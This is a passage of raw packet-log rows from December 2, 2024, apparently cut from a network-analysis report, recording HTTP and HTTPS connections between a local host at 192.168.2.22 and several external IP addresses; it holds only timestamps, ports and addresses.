                                                  Dec 2, 2024 07:24:49.976265907 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.976314068 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.976370096 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.976407051 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.980617046 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.980663061 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.980731964 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.980763912 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.984863043 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.984915018 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.985101938 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.985150099 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.989188910 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.989239931 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.989265919 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.989295006 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.993592978 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.993673086 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.993674040 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.993712902 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.997875929 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.997952938 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.997966051 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.998006105 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.002049923 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.002118111 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.002156019 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.002202988 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.006360054 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.006412029 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.006437063 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.006478071 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.010602951 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.010689020 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.010704994 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.010751009 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.014933109 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.015048027 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.015060902 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.015089989 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.019418001 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.019469023 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.019481897 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.019522905 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.024216890 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.024269104 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.024301052 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.024338961 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.028244019 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.028295040 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.028345108 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.028392076 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.032191992 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.032238960 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.032335997 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.032385111 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.036529064 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.036578894 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.036658049 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.036703110 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.040764093 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.040816069 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.040908098 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.040956974 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.045181036 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.045234919 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.045267105 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.045310020 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.049369097 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.049417973 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.049451113 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.049487114 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.053649902 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.053704023 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.053766966 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.053805113 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.057936907 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.058033943 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.058075905 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.062199116 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.062268972 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.062338114 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.062385082 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.066597939 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.066647053 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.066673994 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.066704988 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.070805073 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.070856094 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.070893049 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.070935011 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.075115919 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.075165987 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.075229883 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.075273991 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.079411983 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.079462051 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.079476118 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.079513073 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.083703041 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.083831072 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.083887100 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.095072031 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.095145941 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.095211029 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.097063065 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.097254992 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.097309113 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.101294041 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.104634047 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:50.176141024 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:50.176275969 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:54.318135977 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:54.318217039 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:55.986673117 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:55.986711025 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:55.986773968 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:55.987138987 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:55.987149000 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:56.904679060 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:56.904731989 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:56.904787064 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:56.908121109 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:56.908138037 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:57.127434969 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:57.199348927 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:57.199421883 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:57.201004028 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:57.201011896 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:57.206094027 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:57.206098080 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:57.949779987 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:57.949994087 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:57.950073957 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:57.950562000 CET49166443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:57.950576067 CET44349166188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:58.489583969 CET4916880192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:58.504669905 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:58.504755974 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:58.609595060 CET8049168146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:58.611424923 CET4916880192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:58.624567986 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:58.624588966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:58.625005007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:58.759630919 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:58.803329945 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.089587927 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.089615107 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.089653969 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.089672089 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.116923094 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.116934061 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.116969109 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.116997957 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.117008924 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.117049932 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.290733099 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.290746927 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.290771961 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.290796995 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.290821075 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.309937954 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.309952974 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.309984922 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.310003042 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.310019970 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.331505060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.331517935 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.331557035 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.331563950 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.355597973 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.355607033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.355670929 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.355679035 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.370558023 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.370568991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.370696068 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.370704889 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.393104076 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.393150091 CET44349169188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:59.393207073 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.396635056 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.396681070 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:59.396738052 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.408015013 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.408036947 CET44349169188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:59.408644915 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:59.408658028 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:59.493746996 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.493758917 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.493804932 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.493818045 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.493829966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.493872881 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.506836891 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.506853104 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.506884098 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.506900072 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.506936073 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.518091917 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.518100977 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.518138885 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.518145084 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.518227100 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.532888889 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.532897949 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.532931089 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.532952070 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.532984018 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.544414043 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.544420958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.544473886 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.544481993 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.559079885 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.559088945 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.559158087 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.559166908 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.570343971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.570353031 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.570455074 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.570466995 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581660986 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581671000 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.581780910 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.581789970 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.582981110 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.696592093 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.696603060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.696739912 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.696752071 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705445051 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705459118 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.705563068 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.705574036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716330051 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716340065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.716445923 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.716455936 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.721421003 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.724549055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.724556923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.724654913 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.724661112 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732697964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732736111 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732786894 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.732795000 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.732845068 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.743459940 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.743469954 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.743617058 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.743624926 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.751611948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.751677990 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.751684904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.762365103 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.762444019 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.762449980 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770495892 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770536900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770570993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.770581961 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.770629883 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.779944897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.779954910 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.780025959 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.780034065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.788156033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.788219929 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.788228035 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.796288967 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.796396017 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.796402931 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.807257891 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.807332039 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.807338953 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815256119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815301895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.815330029 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.815336943 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.819430113 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.895061016 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.895076036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.895131111 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.895138025 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.902358055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.902420044 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.902426004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.908608913 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.908731937 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.908737898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.914678097 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.914737940 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.914743900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.922175884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.922267914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.922276020 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927742958 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927784920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.927829027 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.927836895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.931433916 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.933222055 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.933233023 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.933307886 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.933314085 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.940237999 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.940345049 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.940351963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.945444107 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.945534945 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.945544004 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.948621035 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.948703051 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.948713064 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.951586962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.951657057 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.951664925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.955318928 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.955426931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976511955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976528883 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976538897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976593018 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976643085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976643085 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.976655006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976664066 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:24:59.976722956 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.977452993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:24:59.977525949 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.097599983 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.097717047 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.097737074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.100368977 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.100452900 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.100461006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.103385925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.103451014 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.103457928 CET44349167142.215.209.77192.168.2.22
